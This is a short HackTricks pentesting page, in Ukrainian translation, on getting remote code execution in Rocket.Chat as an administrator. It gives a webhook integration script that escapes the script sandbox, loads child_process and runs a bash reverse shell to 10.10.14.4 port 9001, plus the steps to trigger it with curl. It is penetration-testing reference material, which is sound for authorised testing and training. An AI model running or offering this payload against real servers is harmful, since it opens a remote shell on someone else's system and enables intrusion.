hacktricks/network-services-pentesting/pentesting-web/rocket-chat.md

4.5 KiB
Raw Permalink Blame History

Rocket Chat

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

{% embed url="https://websec.nl/" %}

RCE

Якщо ви адміністратор у Rocket Chat, ви можете отримати RCE.

  • Перейдіть до Integrations і виберіть New Integration, а потім виберіть будь-який: Incoming WebHook або Outgoing WebHook.
  • /admin/integrations/incoming
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
  • Налаштуйте WebHook (канал і пост як ім'я користувача повинні існувати):
  • Налаштуйте скрипт WebHook:
  • Збережіть зміни
  • Отримайте згенеровану URL-адресу WebHook:
  • Викличте її за допомогою curl, і ви повинні отримати rev shell

{% embed url="https://websec.nl/" %}

{% hint style="success" %} Вчіться та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вчіться та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Підтримайте HackTricks
{% endhint %}